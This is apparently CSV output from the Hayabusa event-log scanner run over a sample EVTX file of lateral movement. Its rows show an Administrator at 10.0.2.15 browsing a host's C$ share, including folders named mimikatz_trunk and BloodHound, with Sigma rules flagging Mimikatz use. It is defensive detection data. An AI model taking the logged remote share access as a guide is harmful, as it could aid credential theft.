10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Zoom : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\css : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\fonts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\img : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.519 
+09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\HackingStuff : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\HackingStuff\logs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\mimikatz_trunk : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\mimikatz_trunk\Win32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 
23:23:25.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\mimikatz_trunk\x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Documents : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\Links : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Saved Games : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Music\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Contacts : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop\mimikatz_trunk : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop\mimikatz_trunk\Win32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop\mimikatz_trunk\x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user02\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator 
: Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Videos : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Downloads\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Saved Games\desktop.ini : IP Address: 
